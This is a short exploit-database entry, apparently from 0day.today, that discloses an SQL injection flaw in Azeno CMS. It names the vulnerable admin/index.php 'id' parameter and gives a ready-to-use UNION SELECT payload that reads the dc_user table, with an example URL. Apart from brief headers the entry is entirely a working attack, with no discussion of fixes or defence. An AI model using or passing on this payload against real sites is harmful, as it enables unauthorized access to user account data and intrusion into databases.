id: 9650
date: 03/13/2010
title: Azeno CMS SQL Injection Vulnerability
author: DevilZ TM
cves: 

=====================================
Azeno CMS SQL Injection Vulnerability
=====================================

[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/admin/index.php?id=[SQL]
  
[~] ExploiT         :
  
-1 UNION SELECT 1,2,3,4,5,6,7 FROM dc_user
  
[~] Example         :
  
http://127.0.0.1/admin/index.php?id=-1 UNION SELECT 1,2,3,4,5,6,7 FROM dc_user



#  0day.today [2023-03-22]  #